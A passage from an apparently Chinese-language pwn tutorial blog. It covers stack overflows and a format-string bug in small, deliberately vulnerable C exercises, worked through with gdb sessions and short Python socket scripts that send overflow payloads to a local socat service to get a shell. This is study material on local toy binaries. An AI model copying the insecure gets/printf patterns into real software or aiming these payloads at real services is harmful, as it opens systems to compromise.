executable)\u662f\u4e00\u79cd\u751f\u6210\u5730\u5740\u65e0\u5173\u53ef\u6267\u884c\u7a0b\u5e8f\u7684\u6280\u672f\u3002\u5982\u679c\u7f16\u8bd1\u5668\u5728\u751f\u6210\u53ef\u6267\u884c\u7a0b\u5e8f\u7684\u8fc7\u7a0b\u4e2d\u4f7f\u7528\u4e86PIE\uff0c\u90a3\u4e48\u5f53\u53ef\u6267\u884c\u7a0b\u5e8f\u88ab\u52a0\u8f7d\u5230\u5185\u5b58\u4e2d\u65f6\u5176\u52a0\u8f7d\u5730\u5740\u5b58\u5728\u4e0d\u53ef\u9884\u77e5\u6027\u3002<\/p>\n<p>\u8be6\u7ec6\u53ef\u4ee5\u770bhttps:\/\/blog.csdn.net\/weixin_33842304\/article\/details\/91443399<\/p>\n<\/blockquote>\n<pre><code 
class=\"language-bash\">hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ gcc question_1.c -no-pie -o question_1_x64_nopie\nquestion_1.c: In function \u2018main\u2019:\nquestion_1.c:22:2: warning: implicit declaration of function \u2018gets\u2019; did you mean \u2018fgets\u2019? [-Wimplicit-function-declaration]\n  gets(a);\n  ^~~~\n  fgets\nquestion_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]\n  printf(a);\n         ^\n\/tmp\/ccpFE2xY.o: In function `main&#039;:\nquestion_1.c:(.text+0xc4): warning: the `gets&#039; function is dangerous and should not be used.\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ll\ntotal 856\ndrwxrwxrwx 1 hack hack   4096 Jun 15 00:14 .\/\ndrwxrwxrwx 1 hack hack   4096 Jun 10 17:53 ..\/\n-rwxrwxrwx 1 hack hack   8760 Jun 14 13:30 a.out*\n-rwxrwxrwx 1 hack hack    409 Jun 10 17:53 question_1.c*\n-rwxrwxrwx 1 hack hack   8728 Jun 15 00:14 question_1_x64_nopie*\n-rwxrwxrwx 1 hack hack 850080 Jun 14 13:31 question_1_x64_static*\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ objdump -d question_1_x64_nopie -M intel |less\n00000000004007bb &lt;main&gt;:\n  4007bb:       55                      push   rbp\n  4007bc:       48 89 e5                mov    rbp,rsp\n  4007bf:       48 83 ec 20             sub    rsp,0x20\n  4007c3:       64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28\n  4007ca:       00 00\n  4007cc:       48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax\n  4007d0:       31 c0                   xor    eax,eax\n  4007d2:       48 c7 45 e8 00 00 00    mov    QWORD PTR [rbp-0x18],0x0\n  4007d9:       00\n  4007da:       48 c7 45 f0 00 00 00    mov    QWORD PTR [rbp-0x10],0x0\n  4007e1:       00\n  4007e2:       48 8d 3d db 00 00 00    lea    rdi,[rip+0xdb]        # 4008c4 &lt;_IO_stdin_used+0x4&gt;\n  4007e9:       e8 02 fe ff ff          call   4005f0 &lt;puts@plt&gt;\n  4007ee:       48 8d 45 e8             lea    
rax,[rbp-0x18]\n  4007f2:       48 89 c7                mov    rdi,rax\n  4007f5:       b8 00 00 00 00          mov    eax,0x0\n  4007fa:       e8 31 fe ff ff          call   400630 &lt;gets@plt&gt;\n  4007ff:       48 8d 45 e8             lea    rax,[rbp-0x18]\n  400803:       48 89 c7                mov    rdi,rax\n  400806:       b8 00 00 00 00          mov    eax,0x0\n  40080b:       e8 10 fe ff ff          call   400620 &lt;printf@plt&gt;\n  400810:       0f b6 45 f0             movzx  eax,BYTE PTR [rbp-0x10]\n  400814:       3c 61                   cmp    al,0x61\n  400816:       75 0c                   jne    400824 &lt;main+0x69&gt;\n  400818:       48 8d 3d 39 08 20 00    lea    rdi,[rip+0x200839]        # 601058 &lt;sh&gt;\n  40081f:       e8 78 ff ff ff          call   40079c &lt;func&gt;\n  400824:       b8 00 00 00 00          mov    eax,0x0\n  400829:       48 8b 55 f8             mov    rdx,QWORD PTR [rbp-0x8]\n  40082d:       64 48 33 14 25 28 00    xor    rdx,QWORD PTR fs:0x28\n  400834:       00 00\n  400836:       74 05                   je     40083d &lt;main+0x82&gt;\n  400838:       e8 c3 fd ff ff          call   400600 &lt;__stack_chk_fail@plt&gt;\n  40083d:       c9                      leave\n  40083e:       c3                      ret\n  40083f:       90                      nop<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202206160153618.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202206160153618.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220615005254023\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4f5c\u4e1a<\/h2>\n<pre><code class=\"language-bash\">hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5$ ls\nquestion_2.c  question_2_x64\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5$ cat question_2.c\n#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;unistd.h&gt;\nchar sh[]=&quot;\/bin\/sh&quot;;\n\nint init_func(){\n    setvbuf(stdin,0,2,0);\n    setvbuf(stdout,0,2,0);\n    setvbuf(stderr,0,2,0);\n    return 0;\n}\n\nint func(char *cmd){\n        system(cmd);\n        return 0;\n}\n\nint main(){\n    init_func();\n    char a[8] = {};\n    char b[8] = {};\n        puts(&quot;input:&quot;);\n        gets(a);\n        printf(a);\n        if(!strcmp(b,&quot;deadbeef&quot;)){\n                func(sh);\n        }\n    return 0;\n}\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5$ .\/question_2_x64\ninput:\naaaaaaaadeadbeef\naaaaaaaadeadbeef$ whoami\nhack\n$ exit<\/code><\/pre>\n<pre><code class=\"language-assembly\">hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5$ gdb .\/question_2_x64\nGNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1\nCopyright (C) 2018 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.  
Type &quot;show copying&quot;\nand &quot;show warranty&quot; for details.\nThis GDB was configured as &quot;x86_64-linux-gnu&quot;.\nType &quot;show configuration&quot; for configuration details.\nFor bug reporting instructions, please see:\n&lt;http:\/\/www.gnu.org\/software\/gdb\/bugs\/&gt;.\nFind the GDB manual and other documentation resources online at:\n&lt;http:\/\/www.gnu.org\/software\/gdb\/documentation\/&gt;.\nFor help, type &quot;help&quot;.\nType &quot;apropos word&quot; to search for commands related to &quot;word&quot;...\nReading symbols from .\/question_2_x64...(no debugging symbols found)...done.\n\n(gdb) start\nTemporary breakpoint 3 at 0x555555555295\nStarting program: \/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5\/question_2_x64\n\nTemporary breakpoint 3, 0x0000555555555295 in main ()\n(gdb) disassemble $rip\nDump of assembler code for function main:\n=&gt; 0x0000555555555295 &lt;+0&gt;:     endbr64\n   0x0000555555555299 &lt;+4&gt;:     push   rbp\n   0x000055555555529a &lt;+5&gt;:     mov    rbp,rsp\n   0x000055555555529d &lt;+8&gt;:     sub    rsp,0x20\n   0x00005555555552a1 &lt;+12&gt;:    mov    rax,QWORD PTR fs:0x28\n   0x00005555555552aa &lt;+21&gt;:    mov    QWORD PTR [rbp-0x8],rax\n   0x00005555555552ae &lt;+25&gt;:    xor    eax,eax\n   0x00005555555552b0 &lt;+27&gt;:    mov    eax,0x0\n   0x00005555555552b5 &lt;+32&gt;:    call   0x555555555209 &lt;init_func&gt;\n   0x00005555555552ba &lt;+37&gt;:    mov    QWORD PTR [rbp-0x18],0x0\n   0x00005555555552c2 &lt;+45&gt;:    mov    QWORD PTR [rbp-0x10],0x0\n   0x00005555555552ca &lt;+53&gt;:    lea    rdi,[rip+0xd33]        # 0x555555556004\n   0x00005555555552d1 &lt;+60&gt;:    call   0x5555555550b0 &lt;puts@plt&gt;\n   0x00005555555552d6 &lt;+65&gt;:    lea    rax,[rbp-0x18]\n   0x00005555555552da &lt;+69&gt;:    mov    rdi,rax\n   0x00005555555552dd &lt;+72&gt;:    mov    eax,0x0\n   0x00005555555552e2 &lt;+77&gt;:    call   0x555555555100 &lt;gets@plt&gt;\n   0x00005555555552e7 
&lt;+82&gt;:    lea    rax,[rbp-0x18]\n   0x00005555555552eb &lt;+86&gt;:    mov    rdi,rax\n   0x00005555555552ee &lt;+89&gt;:    mov    eax,0x0\n   0x00005555555552f3 &lt;+94&gt;:    call   0x5555555550e0 &lt;printf@plt&gt;\n   0x00005555555552f8 &lt;+99&gt;:    lea    rax,[rbp-0x10]\n   0x00005555555552fc &lt;+103&gt;:   lea    rsi,[rip+0xd08]        # 0x55555555600b\n   0x0000555555555303 &lt;+110&gt;:   mov    rdi,rax\n   0x0000555555555306 &lt;+113&gt;:   call   0x5555555550f0 &lt;strcmp@plt&gt;\n   0x000055555555530b &lt;+118&gt;:   test   eax,eax\n   0x000055555555530d &lt;+120&gt;:   jne    0x55555555531b &lt;main+134&gt;\n   0x000055555555530f &lt;+122&gt;:   lea    rdi,[rip+0x2cfa]        # 0x555555558010 &lt;sh&gt;\n---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---\n   0x0000555555555316 &lt;+129&gt;:   call   0x555555555272 &lt;func&gt;\n   0x000055555555531b &lt;+134&gt;:   mov    eax,0x0\n   0x0000555555555320 &lt;+139&gt;:   mov    rdx,QWORD PTR [rbp-0x8]\n   0x0000555555555324 &lt;+143&gt;:   xor    rdx,QWORD PTR fs:0x28\n   0x000055555555532d &lt;+152&gt;:   je     0x555555555334 &lt;main+159&gt;\n   0x000055555555532f &lt;+154&gt;:   call   0x5555555550c0 &lt;__stack_chk_fail@plt&gt;\n   0x0000555555555334 &lt;+159&gt;:   leave\n   0x0000555555555335 &lt;+160&gt;:   ret\nEnd of assembler dump.\n(gdb) b *0x000055555555530b\nBreakpoint 4 at 0x55555555530b\n(gdb) c\nContinuing.\ninput:\naaaaaaa\naaaaaaa\nBreakpoint 4, 0x000055555555530b in main ()\n(gdb) x\/10i $rip\n=&gt; 0x55555555530b &lt;main+118&gt;:   test   eax,eax\n   0x55555555530d &lt;main+120&gt;:   jne    0x55555555531b &lt;main+134&gt;\n   0x55555555530f &lt;main+122&gt;:   lea    rdi,[rip+0x2cfa]        # 0x555555558010 &lt;sh&gt;\n   0x555555555316 &lt;main+129&gt;:   call   0x555555555272 &lt;func&gt;\n   0x55555555531b &lt;main+134&gt;:   mov    eax,0x0\n   0x555555555320 &lt;main+139&gt;:   mov    rdx,QWORD PTR [rbp-0x8]\n   0x555555555324 &lt;main+143&gt;:   xor   
 rdx,QWORD PTR fs:0x28\n   0x55555555532d &lt;main+152&gt;:   je     0x555555555334 &lt;main+159&gt;\n   0x55555555532f &lt;main+154&gt;:   call   0x5555555550c0 &lt;__stack_chk_fail@plt&gt;\n   0x555555555334 &lt;main+159&gt;:   leave\n(gdb) i r\nrax            0xffffff9c       4294967196\nrbx            0x0      0\nrcx            0x0      0\nrdx            0x64     100\nrsi            0x55555555600b   93824992239627\nrdi            0x7fffffffdb90   140737488346000\nrbp            0x7fffffffdba0   0x7fffffffdba0\nrsp            0x7fffffffdb80   0x7fffffffdb80\nr8             0x7      7\nr9             0x7ffff7fe94c0   140737354044608\nr10            0x2      2\nr11            0x246    582\nr12            0x555555555120   93824992235808\nr13            0x7fffffffdc80   140737488346240\nr14            0x0      0\nr15            0x0      0\nrip            0x55555555530b   0x55555555530b &lt;main+118&gt;\neflags         0x297    [ CF PF AF SF IF ]\ncs             0x33     51\nss             0x2b     43\nds             0x0      0\nes             0x0      0\nfs             0x0      0\ngs             0x0      0\n(gdb) set $eax=0x00\n(gdb) i r\nrax            0x0      0\nrbx            0x0      0\nrcx            0x0      0\nrdx            0x64     100\nrsi            0x55555555600b   93824992239627\nrdi            0x7fffffffdb90   140737488346000\nrbp            0x7fffffffdba0   0x7fffffffdba0\nrsp            0x7fffffffdb80   0x7fffffffdb80\nr8             0x7      7\nr9             0x7ffff7fe94c0   140737354044608\nr10            0x2      2\nr11            0x246    582\nr12            0x555555555120   93824992235808\nr13            0x7fffffffdc80   140737488346240\nr14            0x0      0\nr15            0x0      0\nrip            0x55555555530b   0x55555555530b &lt;main+118&gt;\neflags         0x297    [ CF PF AF SF IF ]\ncs             0x33     51\nss             0x2b     43\nds             0x0      0\nes             0x0      0\nfs             0x0      0\ngs          
   0x0      0\n(gdb) ni\n0x000055555555530d in main ()\n(gdb) x\/10i $rip\n=&gt; 0x55555555530d &lt;main+120&gt;:   jne    0x55555555531b &lt;main+134&gt;\n   0x55555555530f &lt;main+122&gt;:   lea    rdi,[rip+0x2cfa]        # 0x555555558010 &lt;sh&gt;\n   0x555555555316 &lt;main+129&gt;:   call   0x555555555272 &lt;func&gt;\n   0x55555555531b &lt;main+134&gt;:   mov    eax,0x0\n   0x555555555320 &lt;main+139&gt;:   mov    rdx,QWORD PTR [rbp-0x8]\n   0x555555555324 &lt;main+143&gt;:   xor    rdx,QWORD PTR fs:0x28\n   0x55555555532d &lt;main+152&gt;:   je     0x555555555334 &lt;main+159&gt;\n   0x55555555532f &lt;main+154&gt;:   call   0x5555555550c0 &lt;__stack_chk_fail@plt&gt;\n   0x555555555334 &lt;main+159&gt;:   leave\n   0x555555555335 &lt;main+160&gt;:   ret\n(gdb) ni\n0x000055555555530f in main ()\n(gdb) x\/10i $rip\n=&gt; 0x55555555530f &lt;main+122&gt;:   lea    rdi,[rip+0x2cfa]        # 0x555555558010 &lt;sh&gt;\n   0x555555555316 &lt;main+129&gt;:   call   0x555555555272 &lt;func&gt;\n   0x55555555531b &lt;main+134&gt;:   mov    eax,0x0\n   0x555555555320 &lt;main+139&gt;:   mov    rdx,QWORD PTR [rbp-0x8]\n   0x555555555324 &lt;main+143&gt;:   xor    rdx,QWORD PTR fs:0x28\n   0x55555555532d &lt;main+152&gt;:   je     0x555555555334 &lt;main+159&gt;\n   0x55555555532f &lt;main+154&gt;:   call   0x5555555550c0 &lt;__stack_chk_fail@plt&gt;\n   0x555555555334 &lt;main+159&gt;:   leave\n   0x555555555335 &lt;main+160&gt;:   ret\n   0x555555555336:      nop    WORD PTR cs:[rax+rax*1+0x0]\n(gdb) n\nSingle stepping until exit from function main,\nwhich has no line number information.\n$ whoami\nhack<\/code><\/pre>\n<h1>python\u811a\u672cpwn<\/h1>\n<h2>\u57fa\u7840\u5185\u5bb9<\/h2>\n<p>shell\u65e0\u6cd5\u6253\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u53ea\u80fd\u4f7f\u7528\u811a\u672c\u8fdb\u884cpwn\uff0c\u76ee\u524d\u5e38\u89c1\u7684pwn\u6846\u67b6\u662fpwntools\uff0c\u8fd9\u91cc\u4ee5\u4e00\u4e2apython2\u811a\u672c\u8fdb\u884c\u89e3\u91ca\uff1a<\/p>\n<pre><code 
class=\"language-bash\">hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_5$ cd ..\/test_6\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ ls\nquestion_1_plus.c  question_1_plus_py2.py  question_1_plus_x64\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ cat question_1_plus.c\n#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;unistd.h&gt;\nchar sh[]=&quot;\/bin\/sh&quot;;\nint init_func(){\n    setvbuf(stdin,0,2,0);\n    setvbuf(stdout,0,2,0);\n    setvbuf(stderr,0,2,0);\n    return 0;\n}\n\nint func(char *cmd){\n        system(cmd);\n        return 0;\n}\n\nint main(){\n    char a[8] = {};\n    char b[8] = {};\n    \/\/char a[1] = {&#039;b&#039;};\n        puts(&quot;input:&quot;);\n        gets(a);\n        printf(a);\n        if(b[0]==0x10){\n                func(sh);\n        }\n    return 0;\n}<\/code><\/pre>\n<pre><code class=\"language-python\">hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ .\/question_1_plus_x64\ninput:\naaaaaaaa\\x10\naaaaaaaa\\x10hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ cat question_1_plus_py2.py\nimport socket\nimport telnetlib\nimport struct\n\ndef P32(val):\n        return struct.pack(&quot;&quot;, val)\n\ndef pwn():\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.connect((&quot;127.0.0.1&quot;, 8888))\n        payload = &#039;A&#039;*0x8 + &#039;\\x10&#039;\n        s.sendall(payload + &#039;\\n&#039;)\n        t = telnetlib.Telnet()\n        t.sock = s\n        t.interact()\n\nif __name__ == &quot;__main__&quot;:\n    # socat tcp-l:8888,fork exec:.\/question_1_plus_x64,reuseaddr\n        pwn()<\/code><\/pre>\n<pre><code class=\"language-bash\">hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ nc 127.0.0.1 8888\naaaaaaaadeadbeef\ninput:\naaaaaaaadeadbeef\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_6$ nc 127.0.0.1 
8888\naaaaaaaaaa\ninput:\naaaaaaaaaa<\/code><\/pre>\n<h2>\u4f5c\u4e1a<\/h2>\n<pre><code class=\"language-bash\">hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_7$ gcc -no-pie question_3.c\nquestion_3.c: In function \u2018main\u2019:\nquestion_3.c:26:2: warning: implicit declaration of function \u2018gets\u2019; did you mean \u2018fgets\u2019? [-Wimplicit-function-declaration]\n  gets(&amp;a);\n  ^~~~\n  fgets\n\/tmp\/cc9KypAt.o: In function `main&#039;:\nquestion_3.c:(.text+0xc6): warning: the `gets&#039; function is dangerous and should not be used.\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_7$ ls\na.out  question_3.c  question_3_x64\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_7$ gdb .\/a.out\nGNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1\nCopyright (C) 2018 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.  
Type &quot;show copying&quot;\nand &quot;show warranty&quot; for details.\nThis GDB was configured as &quot;x86_64-linux-gnu&quot;.\nType &quot;show configuration&quot; for configuration details.\nFor bug reporting instructions, please see:\n&lt;http:\/\/www.gnu.org\/software\/gdb\/bugs\/&gt;.\nFind the GDB manual and other documentation resources online at:\n&lt;http:\/\/www.gnu.org\/software\/gdb\/documentation\/&gt;.\nFor help, type &quot;help&quot;.\nType &quot;apropos word&quot; to search for commands related to &quot;word&quot;...\nReading symbols from .\/a.out...(no debugging symbols found)...done.\n(gdb) start\nTemporary breakpoint 1 at 0x40076f\nStarting program: \/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_7\/a.out\n\nTemporary breakpoint 1, 0x000000000040076f in main ()\n(gdb) disassemble main\nDump of assembler code for function main:\n   0x000000000040076b &lt;+0&gt;:     push   rbp\n   0x000000000040076c &lt;+1&gt;:     mov    rbp,rsp\n=&gt; 0x000000000040076f &lt;+4&gt;:     sub    rsp,0x20\n   0x0000000000400773 &lt;+8&gt;:     mov    rax,QWORD PTR fs:0x28\n   0x000000000040077c &lt;+17&gt;:    mov    QWORD PTR [rbp-0x8],rax\n   0x0000000000400780 &lt;+21&gt;:    xor    eax,eax\n   0x0000000000400782 &lt;+23&gt;:    mov    eax,0x0\n   0x0000000000400787 &lt;+28&gt;:    call   0x4006e7 &lt;init_func&gt;\n   0x000000000040078c &lt;+33&gt;:    mov    QWORD PTR [rbp-0x10],0x0\n   0x0000000000400794 &lt;+41&gt;:    lea    rdi,[rip+0xc9]        # 0x400864\n   0x000000000040079b &lt;+48&gt;:    call   0x4005b0 &lt;puts@plt&gt;\n   0x00000000004007a0 &lt;+53&gt;:    lea    rax,[rbp-0x14]\n   0x00000000004007a4 &lt;+57&gt;:    mov    rdi,rax\n   0x00000000004007a7 &lt;+60&gt;:    mov    eax,0x0\n   0x00000000004007ac &lt;+65&gt;:    call   0x4005e0 &lt;gets@plt&gt;\n   0x00000000004007b1 &lt;+70&gt;:    cmp    QWORD PTR [rbp-0x10],0x0\n   0x00000000004007b6 &lt;+75&gt;:    je     0x4007c3 &lt;main+88&gt;\n   0x00000000004007b8 &lt;+77&gt;:    mov    rdx,QWORD 
PTR [rbp-0x10]\n   0x00000000004007bc &lt;+81&gt;:    mov    eax,0x0\n   0x00000000004007c1 &lt;+86&gt;:    call   rdx\n   0x00000000004007c3 &lt;+88&gt;:    mov    eax,0x0\n   0x00000000004007c8 &lt;+93&gt;:    mov    rcx,QWORD PTR [rbp-0x8]\n   0x00000000004007cc &lt;+97&gt;:    xor    rcx,QWORD PTR fs:0x28\n   0x00000000004007d5 &lt;+106&gt;:   je     0x4007dc &lt;main+113&gt;\n   0x00000000004007d7 &lt;+108&gt;:   call   0x4005c0 &lt;__stack_chk_fail@plt&gt;\n   0x00000000004007dc &lt;+113&gt;:   leave\n   0x00000000004007dd &lt;+114&gt;:   ret\nEnd of assembler dump.\n(gdb) b *0x00000000004007b8\nBreakpoint 2 at 0x4007b8\n(gdb) c\nContinuing.\ninput:\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\nBreakpoint 2, 0x00000000004007b8 in main ()\n(gdb) x\/10i $rip\n=&gt; 0x4007b8 &lt;main+77&gt;:  mov    rdx,QWORD PTR [rbp-0x10]\n   0x4007bc &lt;main+81&gt;:  mov    eax,0x0\n   0x4007c1 &lt;main+86&gt;:  call   rdx\n   0x4007c3 &lt;main+88&gt;:  mov    eax,0x0\n   0x4007c8 &lt;main+93&gt;:  mov    rcx,QWORD PTR [rbp-0x8]\n   0x4007cc &lt;main+97&gt;:  xor    rcx,QWORD PTR fs:0x28\n   0x4007d5 &lt;main+106&gt;: je     0x4007dc &lt;main+113&gt;\n   0x4007d7 &lt;main+108&gt;: call   0x4005c0 &lt;__stack_chk_fail@plt&gt;\n   0x4007dc &lt;main+113&gt;: leave\n   0x4007dd &lt;main+114&gt;: ret\n(gdb) x\/20g $rbp-0x10\n0x7fffffffdba0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbb0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbc0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbd0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbe0: 0x6161616161616161      0x77c3006161616161\n0x7fffffffdbf0: 0x0000000000400600      0x00007fffffffdc90\n0x7fffffffdc00: 0x0000000000000000      0x0000000000000000\n0x7fffffffdc10: 0x883cca95299ca51c      0x883cda2ae662a51c\n0x7fffffffdc20: 0x00007fff00000000      0x0000000000000000\n0x7fffffffdc30: 0x0000000000000000      0x00007ffff7de38d3\n(gdb) p &amp;func\n$1 = 
(&lt;text variable, no debug info&gt; *) 0x40074c &lt;func&gt;\n(gdb) set *0x7fffffffdba0=0x40074c\n(gdb) x\/20g $rbp-0x10\n0x7fffffffdba0: 0x616161610040074c      0x6161616161616161\n0x7fffffffdbb0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbc0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbd0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbe0: 0x6161616161616161      0x77c3006161616161\n0x7fffffffdbf0: 0x0000000000400600      0x00007fffffffdc90\n0x7fffffffdc00: 0x0000000000000000      0x0000000000000000\n0x7fffffffdc10: 0x883cca95299ca51c      0x883cda2ae662a51c\n0x7fffffffdc20: 0x00007fff00000000      0x0000000000000000\n0x7fffffffdc30: 0x0000000000000000      0x00007ffff7de38d3\n(gdb) set *0x7fffffffdba4=0\n(gdb) x\/20g $rbp-0x10\n0x7fffffffdba0: 0x000000000040074c      0x6161616161616161\n0x7fffffffdbb0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbc0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbd0: 0x6161616161616161      0x6161616161616161\n0x7fffffffdbe0: 0x6161616161616161      0x77c3006161616161\n0x7fffffffdbf0: 0x0000000000400600      0x00007fffffffdc90\n0x7fffffffdc00: 0x0000000000000000      0x0000000000000000\n0x7fffffffdc10: 0x883cca95299ca51c      0x883cda2ae662a51c\n0x7fffffffdc20: 0x00007fff00000000      0x0000000000000000\n0x7fffffffdc30: 0x0000000000000000      0x00007ffff7de38d3\n(gdb) x\/10i $rip\n=&gt; 0x4007b8 &lt;main+77&gt;:  mov    rdx,QWORD PTR [rbp-0x10]\n   0x4007bc &lt;main+81&gt;:  mov    eax,0x0\n   0x4007c1 &lt;main+86&gt;:  call   rdx\n   0x4007c3 &lt;main+88&gt;:  mov    eax,0x0\n   0x4007c8 &lt;main+93&gt;:  mov    rcx,QWORD PTR [rbp-0x8]\n   0x4007cc &lt;main+97&gt;:  xor    rcx,QWORD PTR fs:0x28\n   0x4007d5 &lt;main+106&gt;: je     0x4007dc &lt;main+113&gt;\n   0x4007d7 &lt;main+108&gt;: call   0x4005c0 &lt;__stack_chk_fail@plt&gt;\n   0x4007dc &lt;main+113&gt;: leave\n   0x4007dd &lt;main+114&gt;: ret\n(gdb) n\nSingle stepping until exit from function main,\nwhich has no 
line number information.\n$ whoami\nhack<\/code><\/pre>\n<pre><code class=\"language-python\">import socket\nimport telnetlib\nimport struct\n\ndef P32(val):\n        return struct.pack(&quot;&quot;, val)\n\ndef pwn():\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.connect((&quot;127.0.0.1&quot;, 8888))\n        payload = &#039;A&#039;*4 + &#039;\\x1f\\x12\\x40\\x00\\x00\\x00\\x00\\x00&#039;  #\u6ce8\u610f\u7aef\u5e8f\n        s.sendall(payload + &#039;\\n&#039;)\n        t = telnetlib.Telnet()\n        t.sock = s\n        t.interact()\n\nif __name__ == &quot;__main__&quot;:\n    # socat tcp-l:8888,fork exec:.\/question_1_plus_x64,reuseaddr\n        pwn()<\/code><\/pre>\n<h2>补充说明<\/h2>\n<p>上面两个脚本里的 <code>P32<\/code> 写成了 <code>struct.pack(&quot;&quot;, val)<\/code>：格式串为空，一旦调用就会抛出 <code>struct.error<\/code>，脚本里实际上没有用到它，而是手写了字节串。打包 x64 地址应写成 <code>struct.pack(&quot;&lt;Q&quot;, val)<\/code>（8 字节小端），32 位地址用 <code>&quot;&lt;I&quot;<\/code>，让 struct 负责端序，避免手写时出错。另外最后一个脚本里的 socat 注释仍然指向 question_1_plus_x64，应改成实际运行的 question_3 二进制。<\/p>\n<p>question_2 和 question_1_plus 里的 <code>printf(a)<\/code> 把用户输入直接当格式串，本身就是一个独立的格式化字符串漏洞（用 <code>%p<\/code> 之类的格式可以泄露栈上的数据，包括 canary），和 <code>gets<\/code> 造成的栈溢出是两个问题。question_2 的 payload <code>aaaaaaaadeadbeef<\/code> 能绕过 canary，是因为 <code>b<\/code>（[rbp-0x10]）紧挨着 canary（[rbp-0x8]），<code>gets<\/code> 写入的结尾 NUL 正好落在 canary 的最低字节上；glibc 在 x86-64 上生成的 canary 最低字节通常本来就是 0x00，所以 <code>strcmp<\/code> 既能读到以 NUL 结尾的 b，<code>__stack_chk_fail<\/code> 也不会触发。再多输入一个字节就会破坏 canary，程序会在 main 返回前中止。<\/p>\n","protected":false},"excerpt":{"rendered":"<p>gcc -o gcc -O1\/O2\/O3 -O\uff0c-O1\uff1a\u8fd9\u4e24\u4e2a\u547d\u4ee4\u7684\u6548\u679c\u662f\u4e00\u6837\u7684\uff0c\u76ee\u7684\u90fd\u662f\u5728\u4e0d\u5f71\u54cd\u7f16\u8bd1\u901f\u5ea6\u7684\u524d 